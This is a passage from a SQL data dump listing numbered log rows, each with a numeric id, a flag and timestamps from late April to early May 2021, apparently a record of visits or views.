13:48:29'),(20142,1594,1,'2021-04-28','2021-04-28 13:59:40'),(20143,76,1,'2021-04-28','2021-04-28 14:01:18'),(20144,1602,1,'2021-04-28','2021-04-28 14:12:33'),(20145,2804,1,'2021-04-28','2021-04-28 14:21:28'),(20146,1594,1,'2021-04-28','2021-04-28 14:26:58'),(20147,87,1,'2021-04-28','2021-04-28 14:33:26'),(20148,68,1,'2021-04-28','2021-04-28 14:33:46'),(20149,76,1,'2021-04-28','2021-04-28 14:33:58'),(20150,72,1,'2021-04-28','2021-04-28 14:34:14'),(20151,108,1,'2021-04-28','2021-04-28 14:34:22'),(20152,80,1,'2021-04-28','2021-04-28 14:34:56'),(20153,2804,1,'2021-04-28','2021-04-28 14:41:26'),(20154,91,1,'2021-04-28','2021-04-28 14:59:07'),(20155,91,1,'2021-04-28','2021-04-28 14:59:33'),(20156,1707,1,'2021-04-28','2021-04-28 15:01:39'),(20157,91,1,'2021-04-28','2021-04-28 15:09:13'),(20158,2309,1,'2021-04-28','2021-04-28 15:26:11'),(20159,2457,1,'2021-04-28','2021-04-28 15:32:40'),(20160,2457,1,'2021-04-28','2021-04-28 15:32:50'),(20161,1718,1,'2021-04-28','2021-04-28 15:36:25'),(20162,1734,1,'2021-04-28','2021-04-28 15:40:01'),(20163,1715,1,'2021-04-28','2021-04-28 15:45:17'),(20164,84,1,'2021-04-28','2021-04-28 15:53:10'),(20165,87,1,'2021-04-28','2021-04-28 15:53:38'),(20166,1584,1,'2021-04-28','2021-04-28 15:54:58'),(20167,2904,1,'2021-04-28','2021-04-28 15:55:36'),(20168,68,1,'2021-04-28','2021-04-28 15:55:41'),(20169,68,1,'2021-04-28','2021-04-28 15:55:47'),(20170,68,1,'2021-04-28','2021-04-28 15:55:54'),(20171,467,1,'2021-04-28','2021-04-28 16:01:43'),(20172,1594,1,'2021-04-28','2021-04-28 16:04:11'),(20173,1594,1,'2021-04-28','2021-04-28 16:11:27'),(20174,91,1,'2021-04-28','2021-04-28 16:11:45'),(20175,1602,1,'2021-04-28','2021-04-28 16:12:08'),(20176,1614,1,'2021-04-28','2021-04-28 16:31:46'),(20177,1602,1,'2021-04-28','2021-04-28 16:36:11'),(20178,1602,1,'2021-04-28','2021-04-28 16:38:24'),(20179,1770,1,'2021-04-28','2021-04-28 16:41:44'),(20180,1602,1,'2021-04-28','2021-04-28 17:59:01'),(20181,1612,1,'2021-04-28','2021-04-28 18:02:07'),(20182,2309,1,'2021-04-28','2021-04-28 18:07:18'),(20183,74,1,'2021-04-28','2021-04-28 18:18:29'),(20184,1600,1,'2021-04-28','2021-04-28 18:32:46'),(20185,1598,1,'2021-04-28','2021-04-28 18:58:28'),(20186,1602,1,'2021-04-28','2021-04-28 19:36:53'),(20187,1588,1,'2021-04-28','2021-04-28 19:43:24'),(20188,1600,1,'2021-04-28','2021-04-28 19:53:28'),(20189,1600,1,'2021-04-28','2021-04-28 20:03:27'),(20190,2704,1,'2021-04-28','2021-04-28 20:23:58'),(20191,3175,1,'2021-04-28','2021-04-28 20:33:47'),(20192,1602,1,'2021-04-28','2021-04-28 20:54:00'),(20193,1596,1,'2021-04-28','2021-04-28 21:33:57'),(20194,1606,1,'2021-04-28','2021-04-28 21:44:07'),(20195,2309,1,'2021-04-28','2021-04-28 22:04:25'),(20196,2769,1,'2021-04-28','2021-04-28 22:15:16'),(20197,1592,1,'2021-04-28','2021-04-28 22:37:45'),(20198,1592,1,'2021-04-28','2021-04-28 22:41:19'),(20199,1592,1,'2021-04-28','2021-04-28 22:41:19'),(20200,2769,1,'2021-04-28','2021-04-28 22:41:31'),(20201,2769,1,'2021-04-28','2021-04-28 22:42:46'),(20202,1582,1,'2021-04-28','2021-04-28 23:14:02'),(20203,2152,1,'2021-04-28','2021-04-28 23:16:29'),(20204,1582,1,'2021-04-28','2021-04-28 23:18:38'),(20205,1602,1,'2021-04-29','2021-04-29 01:10:23'),(20206,1602,1,'2021-04-29','2021-04-29 01:10:34'),(20207,2297,1,'2021-04-29','2021-04-29 01:12:49'),(20208,1602,1,'2021-04-29','2021-04-29 01:14:23'),(20209,91,1,'2021-04-29','2021-04-29 01:16:07'),(20210,2609,1,'2021-04-29','2021-04-29 01:29:35'),(20211,1598,1,'2021-04-29','2021-04-29 02:28:44'),(20212,2769,1,'2021-04-29','2021-04-29 02:32:33'),(20213,2775,1,'2021-04-29','2021-04-29 02:36:36'),(20214,1600,1,'2021-04-29','2021-04-29 02:38:36'),(20215,1594,1,'2021-04-29','2021-04-29 03:30:48'),(20216,1598,1,'2021-04-29','2021-04-29 03:38:25'),(20217,1588,1,'2021-04-29','2021-04-29 04:16:21'),(20218,1602,1,'2021-04-29','2021-04-29 04:51:21'),(20219,467,1,'2021-04-29','2021-04-29 05:06:15'),(20220,1582,1,'2021-04-29','2021-04-29 05:36:16'),(20221,1582,1,'2021-04-29','2021-04-29 05:46:23'),(20222,1606,1,'2021-04-29','2021-04-29 06:41:22'),(20223,1594,1,'2021-04-29','2021-04-29 06:47:32'),(20224,1594,1,'2021-04-29','2021-04-29 06:55:32'),(20225,2309,1,'2021-04-29','2021-04-29 06:58:44'),(20226,2769,1,'2021-04-29','2021-04-29 07:10:50'),(20227,1586,1,'2021-04-29','2021-04-29 07:21:38'),(20228,1586,1,'2021-04-29','2021-04-29 07:24:43'),(20229,2309,1,'2021-04-29','2021-04-29 07:31:01'),(20230,1594,1,'2021-04-29','2021-04-29 07:51:07'),(20231,3051,1,'2021-04-29','2021-04-29 08:02:59'),(20232,1594,1,'2021-04-29','2021-04-29 08:06:52'),(20233,3285,1,'2021-04-29','2021-04-29 08:11:01'),(20234,1600,1,'2021-04-29','2021-04-29 08:59:55'),(20235,2309,1,'2021-04-29','2021-04-29 09:02:27'),(20236,1608,1,'2021-04-29','2021-04-29 09:20:22'),(20237,1582,1,'2021-04-29','2021-04-29 09:36:08'),(20238,91,1,'2021-04-29','2021-04-29 09:40:33'),(20239,1602,1,'2021-04-29','2021-04-29 09:51:39'),(20240,3585,1,'2021-04-29','2021-04-29 10:06:07'),(20241,1596,1,'2021-04-29','2021-04-29 10:12:09'),(20242,1602,1,'2021-04-29','2021-04-29 10:17:12'),(20243,1602,1,'2021-04-29','2021-04-29 10:18:56'),(20244,1602,1,'2021-04-29','2021-04-29 10:20:56'),(20245,1600,1,'2021-04-29','2021-04-29 10:54:23'),(20246,1770,1,'2021-04-29','2021-04-29 10:55:05'),(20247,1600,1,'2021-04-29','2021-04-29 10:55:40'),(20248,3030,1,'2021-04-29','2021-04-29 11:26:17'),(20249,1602,1,'2021-04-29','2021-04-29 12:01:06'),(20250,68,1,'2021-04-29','2021-04-29 12:01:29'),(20251,2804,1,'2021-04-29','2021-04-29 12:30:51'),(20252,1600,1,'2021-04-29','2021-04-29 12:35:45'),(20253,1600,1,'2021-04-29','2021-04-29 12:35:58'),(20254,1602,1,'2021-04-29','2021-04-29 12:38:47'),(20255,80,1,'2021-04-29','2021-04-29 13:05:09'),(20256,68,1,'2021-04-29','2021-04-29 13:05:40'),(20257,1614,1,'2021-04-29','2021-04-29 13:31:21'),(20258,1614,1,'2021-04-29','2021-04-29 13:31:25'),(20259,2309,1,'2021-04-29','2021-04-29 13:38:50'),(20260,3489,1,'2021-04-29','2021-04-29 13:48:37'),(20261,2804,1,'2021-04-29','2021-04-29 13:48:44'),(20262,1718,1,'2021-04-29','2021-04-29 13:52:08'),(20263,1586,1,'2021-04-29','2021-04-29 14:08:48'),(20264,1586,1,'2021-04-29','2021-04-29 14:08:49'),(20265,1586,1,'2021-04-29','2021-04-29 14:08:50'),(20266,1612,1,'2021-04-29','2021-04-29 14:13:17'),(20267,80,1,'2021-04-29','2021-04-29 14:13:34'),(20268,1594,1,'2021-04-29','2021-04-29 14:17:02'),(20269,1594,1,'2021-04-29','2021-04-29 14:18:36'),(20270,1594,1,'2021-04-29','2021-04-29 14:18:36'),(20271,1586,1,'2021-04-29','2021-04-29 14:22:41'),(20272,3034,1,'2021-04-29','2021-04-29 14:33:14'),(20273,1582,1,'2021-04-29','2021-04-29 15:15:50'),(20274,1774,1,'2021-04-29','2021-04-29 15:34:08'),(20275,1602,1,'2021-04-29','2021-04-29 16:03:45'),(20276,1598,1,'2021-04-29','2021-04-29 16:15:12'),(20277,80,1,'2021-04-29','2021-04-29 16:20:24'),(20278,1598,1,'2021-04-29','2021-04-29 16:24:38'),(20279,1600,1,'2021-04-29','2021-04-29 16:32:01'),(20280,1588,1,'2021-04-29','2021-04-29 16:51:33'),(20281,2801,1,'2021-04-29','2021-04-29 16:57:24'),(20282,2769,1,'2021-04-29','2021-04-29 17:16:00'),(20283,2309,1,'2021-04-29','2021-04-29 17:53:33'),(20284,3092,1,'2021-04-29','2021-04-29 17:58:16'),(20285,2609,1,'2021-04-29','2021-04-29 18:05:17'),(20286,74,1,'2021-04-29','2021-04-29 18:23:24'),(20287,1707,1,'2021-04-29','2021-04-29 19:15:08'),(20288,1610,1,'2021-04-29','2021-04-29 19:48:52'),(20289,1594,1,'2021-04-29','2021-04-29 19:52:18'),(20290,1594,1,'2021-04-29','2021-04-29 19:52:35'),(20291,1586,1,'2021-04-29','2021-04-29 20:18:03'),(20292,1586,1,'2021-04-29','2021-04-29 20:18:39'),(20293,1602,1,'2021-04-29','2021-04-29 20:39:58'),(20294,1602,1,'2021-04-29','2021-04-29 20:41:56'),(20295,2309,1,'2021-04-29','2021-04-29 21:14:07'),(20296,1608,1,'2021-04-29','2021-04-29 21:22:52'),(20297,1608,1,'2021-04-29','2021-04-29 21:29:41'),(20298,1608,1,'2021-04-29','2021-04-29 21:30:29'),(20299,3109,1,'2021-04-29','2021-04-29 21:53:57'),(20300,2904,1,'2021-04-29','2021-04-29 21:55:23'),(20301,3104,1,'2021-04-29','2021-04-29 22:03:47'),(20302,1600,1,'2021-04-29','2021-04-29 22:35:04'),(20303,1586,1,'2021-04-29','2021-04-29 22:58:10'),(20304,1586,1,'2021-04-29','2021-04-29 22:58:13'),(20305,1720,1,'2021-04-29','2021-04-29 23:02:07'),(20306,1602,1,'2021-04-29','2021-04-29 23:27:48'),(20307,1602,1,'2021-04-29','2021-04-29 23:28:24'),(20308,91,1,'2021-04-29','2021-04-29 23:28:31'),(20309,2503,1,'2021-04-29','2021-04-29 23:42:00'),(20310,3038,1,'2021-04-29','2021-04-29 23:52:17'),(20311,1586,1,'2021-04-29','2021-04-29 23:52:44'),(20312,1586,1,'2021-04-30','2021-04-30 00:27:43'),(20313,1586,1,'2021-04-30','2021-04-30 00:30:10'),(20314,1590,1,'2021-04-30','2021-04-30 00:56:18'),(20315,1590,1,'2021-04-30','2021-04-30 00:56:35'),(20316,1590,1,'2021-04-30','2021-04-30 00:57:39'),(20317,1586,1,'2021-04-30','2021-04-30 01:28:23'),(20318,1586,1,'2021-04-30','2021-04-30 01:28:32'),(20319,1720,1,'2021-04-30','2021-04-30 01:42:42'),(20320,2503,1,'2021-04-30','2021-04-30 02:23:27'),(20321,1600,1,'2021-04-30','2021-04-30 05:34:03'),(20322,1600,1,'2021-04-30','2021-04-30 05:34:05'),(20323,1600,1,'2021-04-30','2021-04-30 05:34:06'),(20324,1602,1,'2021-04-30','2021-04-30 05:56:54'),(20325,1596,1,'2021-04-30','2021-04-30 07:03:20'),(20326,2309,1,'2021-04-30','2021-04-30 07:54:48'),(20327,3181,1,'2021-04-30','2021-04-30 08:21:26'),(20328,1592,1,'2021-04-30','2021-04-30 09:36:08'),(20329,1592,1,'2021-04-30','2021-04-30 09:36:12'),(20330,1592,1,'2021-04-30','2021-04-30 09:36:14'),(20331,1592,1,'2021-04-30','2021-04-30 09:36:19'),(20332,1592,1,'2021-04-30','2021-04-30 09:36:25'),(20333,1596,1,'2021-04-30','2021-04-30 09:46:11'),(20334,1602,1,'2021-04-30','2021-04-30 10:16:15'),(20335,1602,1,'2021-04-30','2021-04-30 10:21:13'),(20336,1594,1,'2021-04-30','2021-04-30 10:43:54'),(20337,1600,1,'2021-04-30','2021-04-30 10:44:07'),(20338,3099,1,'2021-04-30','2021-04-30 11:26:59'),(20339,1602,1,'2021-04-30','2021-04-30 11:37:13'),(20340,1594,1,'2021-04-30','2021-04-30 11:46:40'),(20341,2309,1,'2021-04-30','2021-04-30 11:54:50'),(20342,1594,1,'2021-04-30','2021-04-30 12:04:24'),(20343,1594,1,'2021-04-30','2021-04-30 12:05:04'),(20344,1614,1,'2021-04-30','2021-04-30 12:06:44'),(20345,1602,1,'2021-04-30','2021-04-30 12:07:56'),(20346,1588,1,'2021-04-30','2021-04-30 12:20:30'),(20347,84,1,'2021-04-30','2021-04-30 12:22:21'),(20348,1544,1,'2021-04-30','2021-04-30 12:34:27'),(20349,1544,1,'2021-04-30','2021-04-30 12:34:28'),(20350,91,1,'2021-04-30','2021-04-30 12:44:42'),(20351,1600,1,'2021-04-30','2021-04-30 13:29:08'),(20352,1614,1,'2021-04-30','2021-04-30 13:36:58'),(20353,1614,1,'2021-04-30','2021-04-30 13:38:50'),(20354,1602,1,'2021-04-30','2021-04-30 13:39:03'),(20355,1602,1,'2021-04-30','2021-04-30 13:39:40'),(20356,2503,1,'2021-04-30','2021-04-30 13:59:37'),(20357,2297,1,'2021-04-30','2021-04-30 14:23:35'),(20358,2297,1,'2021-04-30','2021-04-30 14:27:06'),(20359,3104,1,'2021-04-30','2021-04-30 14:51:19'),(20360,1594,1,'2021-04-30','2021-04-30 15:05:05'),(20361,1594,1,'2021-04-30','2021-04-30 15:05:09'),(20362,1594,1,'2021-04-30','2021-04-30 15:05:34'),(20363,1600,1,'2021-04-30','2021-04-30 16:19:23'),(20364,80,1,'2021-04-30','2021-04-30 16:51:43'),(20365,3045,1,'2021-04-30','2021-04-30 16:52:46'),(20366,80,1,'2021-04-30','2021-04-30 16:54:06'),(20367,2457,1,'2021-04-30','2021-04-30 16:58:38'),(20368,1582,1,'2021-04-30','2021-04-30 17:04:34'),(20369,3069,1,'2021-04-30','2021-04-30 17:13:18'),(20370,3045,1,'2021-04-30','2021-04-30 17:14:14'),(20371,1602,1,'2021-04-30','2021-04-30 17:49:13'),(20372,1602,1,'2021-04-30','2021-04-30 17:53:20'),(20373,1602,1,'2021-04-30','2021-04-30 17:53:53'),(20374,3030,1,'2021-04-30','2021-04-30 18:27:19'),(20375,2804,1,'2021-04-30','2021-04-30 18:54:38'),(20376,2804,1,'2021-04-30','2021-04-30 18:54:43'),(20377,2804,1,'2021-04-30','2021-04-30 18:55:04'),(20378,3489,1,'2021-04-30','2021-04-30 18:56:21'),(20379,3489,1,'2021-04-30','2021-04-30 18:56:22'),(20380,3030,1,'2021-04-30','2021-04-30 19:38:08'),(20381,1586,1,'2021-04-30','2021-04-30 20:44:17'),(20382,1586,1,'2021-04-30','2021-04-30 20:44:19'),(20383,1720,1,'2021-04-30','2021-04-30 21:10:24'),(20384,1720,1,'2021-04-30','2021-04-30 21:20:24'),(20385,1586,1,'2021-04-30','2021-04-30 22:05:33'),(20386,2617,1,'2021-04-30','2021-04-30 22:06:23'),(20387,1586,1,'2021-04-30','2021-04-30 22:11:11'),(20388,2503,1,'2021-04-30','2021-04-30 22:41:55'),(20389,3038,1,'2021-04-30','2021-04-30 22:52:24'),(20390,2309,1,'2021-04-30','2021-04-30 22:58:38'),(20391,80,1,'2021-05-01','2021-05-01 00:51:53'),(20392,1718,1,'2021-05-01','2021-05-01 01:32:22'),(20393,1586,1,'2021-05-01','2021-05-01 02:22:38'),(20394,2769,1,'2021-05-01','2021-05-01 02:42:43'),(20395,1608,1,'2021-05-01','2021-05-01 03:32:43'),(20396,1596,1,'2021-05-01','2021-05-01 08:32:24'),(20397,2297,1,'2021-05-01','2021-05-01 10:14:50'),(20398,1600,1,'2021-05-01','2021-05-01 10:44:52'),(20399,1604,1,'2021-05-01','2021-05-01 12:27:56'),(20400,2248,1,'2021-05-01','2021-05-01 13:02:03'),(20401,570,1,'2021-05-01','2021-05-01 13:02:27'),(20402,1715,1,'2021-05-01','2021-05-01 13:48:21'),(20403,1596,1,'2021-05-01','2021-05-01 14:44:21'),(20404,3430,1,'2021-05-01','2021-05-01 15:08:38'),(20405,68,1,'2021-05-01','2021-05-01 15:57:13'),(20406,1586,1,'2021-05-01','2021-05-01 18:07:32'),(20407,1582,1,'2021-05-01','2021-05-01 20:29:24'),(20408,2248,1,'2021-05-01','2021-05-01 21:21:47'),(20409,2309,1,'2021-05-01','2021-05-01 22:41:30'),(20410,1715,1,'2021-05-01','2021-05-01 23:56:45'),(20411,480,1,'2021-05-02','2021-05-02 00:56:47'),(20412,486,1,'2021-05-02','2021-05-02 02:39:21'),(20413,1602,1,'2021-05-02','2021-05-02 02:45:14'),(20414,2989,1,'2021-05-02','2021-05-02 02:50:54'),(20415,2989,1,'2021-05-02','2021-05-02 02:56:30'),(20416,2410,1,'2021-05-02','2021-05-02 03:02:16'),(20417,2410,1,'2021-05-02','2021-05-02 03:13:50'),(20418,1586,1,'2021-05-02','2021-05-02 04:11:12'),(20419,1774,1,'2021-05-02','2021-05-02 07:27:22'),(20420,2991,1,'2021-05-02','2021-05-02 09:11:43'),(20421,1582,1,'2021-05-02','2021-05-02 11:11:08'),(20422,3430,1,'2021-05-02','2021-05-02 11:18:08'),(20423,1718,1,'2021-05-02','2021-05-02 12:46:07'),(20424,80,1,'2021-05-02','2021-05-02 12:52:11'),(20425,2309,1,'2021-05-02','2021-05-02 13:32:13'),(20426,1588,1,'2021-05-02','2021-05-02 14:15:50'),(20427,1600,1,'2021-05-02','2021-05-02 15:14:52'),(20428,1600,1,'2021-05-02','2021-05-02 15:14:53'),(20429,1600,1,'2021-05-02','2021-05-02 15:14:59'),(20430,1602,1,'2021-05-02','2021-05-02 15:57:37'),(20431,1728,1,'2021-05-02','2021-05-02 15:57:55'),(20432,1602,1,'2021-05-02','2021-05-02 15:58:22'),(20433,1592,1,'2021-05-02','2021-05-02 16:49:01'),(20434,1592,1,'2021-05-02','2021-05-02 16:49:02'),(20435,1592,1,'2021-05-02','2021-05-02 16:49:04'),(20436,2457,1,'2021-05-02','2021-05-02 17:04:35'),(20437,2457,1,'2021-05-02','2021-05-02 17:04:56'),(20438,3489,1,'2021-05-02','2021-05-02 17:43:01'),(20439,570,1,'2021-05-02','2021-05-02 17:53:35'),(20440,480,1,'2021-05-02','2021-05-02 18:20:14'),(20441,80,1,'2021-05-02','2021-05-02 18:29:08'),(20442,1594,1,'2021-05-02','2021-05-02 18:29:23'),(20443,1600,1,'2021-05-02','2021-05-02 18:51:24'),(20444,1592,1,'2021-05-02','2021-05-02 18:55:57'),(20445,1592,1,'2021-05-02','2021-05-02 18:55:57'),(20446,1592,1,'2021-05-02','2021-05-02 18:55:57'),(20447,1592,1,'2021-05-02','2021-05-02 20:04:39'),(20448,3287,1,'2021-05-02','2021-05-02 21:26:47'),(20449,1774,1,'2021-05-02','2021-05-02 21:28:09'),(20450,80,1,'2021-05-02','2021-05-02 21:41:43'),(20451,1766,1,'2021-05-02','2021-05-02 21:56:52'),(20452,1766,1,'2021-05-02','2021-05-02 21:59:16'),(20453,3099,1,'2021-05-03','2021-05-03 00:09:09'),(20454,3107,1,'2021-05-03','2021-05-03 01:42:49'),(20455,1741,1,'2021-05-03','2021-05-03 02:29:32'),(20456,3127,1,'2021-05-03','2021-05-03 03:10:13'),(20457,2309,1,'2021-05-03','2021-05-03 03:27:01'),(20458,1600,1,'2021-05-03','2021-05-03 04:07:31'),(20459,2617,1,'2021-05-03','2021-05-03 04:27:36'),(20460,1608,1,'2021-05-03','2021-05-03 05:23:09'),(20461,1766,1,'2021-05-03','2021-05-03 06:47:19'),(20462,91,1,'2021-05-03','2021-05-03 08:12:52'),(20463,1544,1,'2021-05-03','2021-05-03 08:46:33'),(20464,1612,1,'2021-05-03','2021-05-03 09:32:26'),(20465,3030,1,'2021-05-03','2021-05-03 09:45:18'),(20466,2809,1,'2021-05-03','2021-05-03 09:58:13'),(20467,1734,1,'2021-05-03','2021-05-03 10:54:40'),(20468,1586,1,'2021-05-03','2021-05-03 11:51:02'),(20469,1594,1,'2021-05-03','2021-05-03 13:09:52'),(20470,1594,1,'2021-05-03','2021-05-03 13:10:23'),(20471,1594,1,'2021-05-03','2021-05-03 13:25:08'),(20472,91,1,'2021-05-03','2021-05-03 13:28:07'),(20473,3092,1,'2021-05-03','2021-05-03 13:40:31'),(20474,91,1,'2021-05-03','2021-05-03 13:44:03'),(20475,2904,1,'2021-05-03','2021-05-03 13:44:44'),(20476,3096,1,'2021-05-03','2021-05-03 13:45:44'),(20477,3079,1,'2021-05-03','2021-05-03 13:47:05'),(20478,91,1,'2021-05-03','2021-05-03 13:47:17'),(20479,3096,1,'2021-05-03','2021-05-03 13:48:04'),(20480,3097,1,'2021-05-03','2021-05-03 13:50:28'),(20481,3092,1,'2021-05-03','2021-05-03 13:51:35'),(20482,89,1,'2021-05-03','2021-05-03 13:56:55'),(20483,1586,1,'2021-05-03','2021-05-03 13:57:03'),(20484,2503,1,'2021-05-03','2021-05-03 15:01:30'),(20485,91,1,'2021-05-03','2021-05-03 15:06:25'),(20486,3102,1,'2021-05-03','2021-05-03 15:06:56'),(20487,91,1,'2021-05-03','2021-05-03 15:07:56'),(20488,1588,1,'2021-05-03','2021-05-03 15:38:04'),(20489,2503,1,'2021-05-03','2021-05-03 15:41:20'),(20490,1604,1,'2021-05-03','2021-05-03 15:52:02'),(20491,1604,1,'2021-05-03','2021-05-03 15:52:52'),(20492,1604,1,'2021-05-03','2021-05-03 16:26:31'),(20493,3430,1,'2021-05-03','2021-05-03 16:40:54'),(20494,2989,1,'2021-05-03','2021-05-03 16:41:26'),(20495,2769,1,'2021-05-03','2021-05-03 18:04:25'),(20496,2809,1,'2021-05-03','2021-05-03 18:14:11'),(20497,2804,1,'2021-05-03','2021-05-03 18:17:06'),(20498,2956,1,'2021-05-03','2021-05-03 18:18:25'),(20499,3109,1,'2021-05-03','2021-05-03 19:06:07'),(20500,3109,1,'2021-05-03','2021-05-03 19:22:15'),(20501,1600,1,'2021-05-03','2021-05-03 21:00:52'),(20502,1600,1,'2021-05-03','2021-05-03 21:00:52'),(20503,1600,1,'2021-05-03','2021-05-03 21:07:28'),(20504,1600,1,'2021-05-03','2021-05-03 21:08:13'),(20505,1600,1,'2021-05-03','2021-05-03 21:15:53'),(20506,3226,1,'2021-05-03','2021-05-03 21:21:50'),(20507,2769,1,'2021-05-03','2021-05-03 21:28:47'),(20508,1602,1,'2021-05-03','2021-05-03 21:52:32'),(20509,1582,1,'2021-05-03','2021-05-03 22:06:31'),(20510,1582,1,'2021-05-03','2021-05-03 22:11:52'),(20511,1592,1,'2021-05-03','2021-05-03 23:11:10'),(20512,1594,1,'2021-05-03','2021-05-03 23:56:43'),(20513,76,1,'2021-05-03','2021-05-03 23:58:05'),(20514,2159,1,'2021-05-04','2021-05-04 00:33:27'),(20515,3694,1,'2021-05-04','2021-05-04 02:02:52'),(20516,1594,1,'2021-05-04','2021-05-04 03:28:51'),(20517,1592,1,'2021-05-04','2021-05-04 03:31:25'),(20518,1709,1,'2021-05-04','2021-05-04 03:51:17'),(20519,3104,1,'2021-05-04','2021-05-04 04:41:17'),(20520,2248,1,'2021-05-04','2021-05-04 05:07:22'),(20521,1582,1,'2021-05-04','2021-05-04 06:27:53'),(20522,72,1,'2021-05-04','2021-05-04 06:43:15'),(20523,3704,1,'2021-05-04','2021-05-04 06:51:25'),(20524,3705,1,'2021-05-04','2021-05-04 06:57:37'),(20525,3706,1,'2021-05-04','2021-05-04 07:01:12'),(20526,3030,1,'2021-05-04','2021-05-04 07:02:37'),(20527,2159,1,'2021-05-04','2021-05-04 07:43:11'),(20528,3027,1,'2021-05-04','2021-05-04 07:53:40'),(20529,1594,1,'2021-05-04','2021-05-04 08:33:34'),(20530,2309,1,'2021-05-04','2021-05-04 08:41:04'),(20531,2159,1,'2021-05-04','2021-05-04 08:43:02'),(20532,1608,1,'2021-05-04','2021-05-04 08:47:22'),(20533,91,1,'2021-05-04','2021-05-04 08:55:26'),(20534,91,1,'2021-05-04','2021-05-04 08:58:25'),(20535,1594,1,'2021-05-04','2021-05-04 08:58:28'),(20536,1590,1,'2021-05-04','2021-05-04 08:59:38'),(20537,1586,1,'2021-05-04','2021-05-04 09:01:01'),(20538,1586,1,'2021-05-04','2021-05-04 09:01:13'),(20539,91,1,'2021-05-04','2021-05-04 09:15:00'),(20540,1604,1,'2021-05-04','2021-05-04 09:27:16'),(20541,89,1,'2021-05-04','2021-05-04 09:27:50'),(20542,76,1,'2021-05-04','2021-05-04 09:28:08'),(20543,68,1,'2021-05-04','2021-05-04 09:28:13'),(20544,76,1,'2021-05-04','2021-05-04 09:28:32'),(20545,89,1,'2021-05-04','2021-05-04 09:28:36'),(20546,1604,1,'2021-05-04','2021-05-04 09:28:38'),(20547,2161,1,'2021-05-04','2021-05-04 09:33:26'),(20548,2161,1,'2021-05-04','2021-05-04 09:34:22'),(20549,2411,1,'2021-05-04','2021-05-04 09:40:54'),(20550,570,1,'2021-05-04','2021-05-04 09:42:01'),(20551,3489,1,'2021-05-04','2021-05-04 09:42:08'),(20552,570,1,'2021-05-04','2021-05-04 09:45:06'),(20553,3226,1,'2021-05-04','2021-05-04 10:07:22'),(20554,3282,1,'2021-05-04','2021-05-04 10:47:21'),(20555,2309,1,'2021-05-04','2021-05-04 10:53:08'),(20556,1592,1,'2021-05-04','2021-05-04 11:08:10'),(20557,2457,1,'2021-05-04','2021-05-04 11:59:47'),(20558,84,1,'2021-05-04','2021-05-04 12:00:09'),(20559,1602,1,'2021-05-04','2021-05-04 12:14:45'),(20560,80,1,'2021-05-04','2021-05-04 12:16:01'),(20561,1602,1,'2021-05-04','2021-05-04 12:19:33'),(20562,1614,1,'2021-05-04','2021-05-04 12:48:20'),(20563,1588,1,'2021-05-04','2021-05-04 13:04:15'),(20564,1602,1,'2021-05-04','2021-05-04 13:27:45'),(20565,1602,1,'2021-05-04','2021-05-04 13:28:14'),(20566,3226,1,'2021-05-04','2021-05-04 14:42:40'),(20567,1602,1,'2021-05-04','2021-05-04 15:00:43'),(20568,91,1,'2021-05-04','2021-05-04 15:34:00'),(20569,76,1,'2021-05-04','2021-05-04 15:39:26'),(20570,68,1,'2021-05-04','2021-05-04 15:39:47'),(20571,1594,1,'2021-05-04','2021-05-04 15:42:55'),(20572,1614,1,'2021-05-04','2021-05-04 15:48:47'),(20573,2309,1,'2021-05-04','2021-05-04 16:02:41'),(20574,2309,1,'2021-05-04','2021-05-04 16:02:43'),(20575,2248,1,'2021-05-04','2021-05-04 16:03:16'),(20576,2309,1,'2021-05-04','2021-05-04 16:03:29'),(20577,2309,1,'2021-05-04','2021-05-04 16:05:34'),(20578,1586,1,'2021-05-04','2021-05-04 16:23:45'),(20579,1586,1,'2021-05-04','2021-05-04 16:23:48'),(20580,1586,1,'2021-05-04','2021-05-04 16:23:50'),(20581,1586,1,'2021-05-04','2021-05-04 16:23:51'),(20582,1586,1,'2021-05-04','2021-05-04 16:23:51'),(20583,1586,1,'2021-05-04','2021-05-04 16:24:11'),(20584,1586,1,'2021-05-04','2021-05-04 16:24:27'),(20585,1586,1,'2021-05-04','2021-05-04 16:25:35'),(20586,2309,1,'2021-05-04','2021-05-04 16:53:29'),(20587,480,1,'2021-05-04','2021-05-04 17:03:12'),(20588,2309,1,'2021-05-04','2021-05-04 17:14:09'),(20589,1594,1,'2021-05-04','2021-05-04 17:28:08'),(20590,108,1,'2021-05-04','2021-05-04 17:47:12'),(20591,2457,1,'2021-05-04','2021-05-04 17:48:12'),(20592,1608,1,'2021-05-04','2021-05-04 17:49:15'),(20593,1594,1,'2021-05-04','2021-05-04 17:55:48'),(20594,1586,1,'2021-05-04','2021-05-04 18:16:46'),(20595,80,1,'2021-05-04','2021-05-04 18:17:08'),(20596,2801,1,'2021-05-04','2021-05-04 18:18:05'),(20597,3072,1,'2021-05-04','2021-05-04 18:39:11'),(20598,1608,1,'2021-05-04','2021-05-04 18:49:28'),(20599,3083,1,'2021-05-04','2021-05-04 19:04:37'),(20600,2813,1,'2021-05-04','2021-05-04 19:14:41'),(20601,1594,1,'2021-05-04','2021-05-04 19:40:45'),(20602,2769,1,'2021-05-04','2021-05-04 22:15:39'),(20603,2775,1,'2021-05-04','2021-05-04 22:15:50'),(20604,84,1,'2021-05-04','2021-05-04 22:17:12'),(20605,76,1,'2021-05-04','2021-05-04 22:17:28'),(20606,76,1,'2021-05-04','2021-05-04 22:18:28'),(20607,84,1,'2021-05-04','2021-05-04 22:18:30'),(20608,2775,1,'2021-05-04','2021-05-04 22:18:33'),(20609,570,1,'2021-05-04','2021-05-04 22:32:48'),(20610,570,1,'2021-05-04','2021-05-04 22:32:58'),(20611,3072,1,'2021-05-04','2021-05-04 22:36:35'),(20612,3038,1,'2021-05-04','2021-05-04 22:45:43'),(20613,2991,1,'2021-05-04','2021-05-04 23:09:45'),(20614,1594,1,'2021-05-04','2021-05-04 23:57:51'),(20615,1594,1,'2021-05-05','2021-05-05 00:01:16'),(20616,2457,1,'2021-05-05','2021-05-05 02:45:29'),(20617,2457,1,'2021-05-05','2021-05-05 02:50:26'),(20618,2457,1,'2021-05-05','2021-05-05 02:50:48'),(20619,2457,1,'2021-05-05','2021-05-05 02:58:26'),(20620,1594,1,'2021-05-05','2021-05-05 03:14:11'),(20621,1608,1,'2021-05-05','2021-05-05 03:54:32'),(20622,1596,1,'2021-05-05','2021-05-05 04:33:38'),(20623,3261,1,'2021-05-05','2021-05-05 05:44:34'),(20624,3079,1,'2021-05-05','2021-05-05 05:45:16'),(20625,1606,1,'2021-05-05','2021-05-05 05:48:08'),(20626,1695,1,'2021-05-05','2021-05-05 05:55:07'),(20627,2609,1,'2021-05-05','2021-05-05 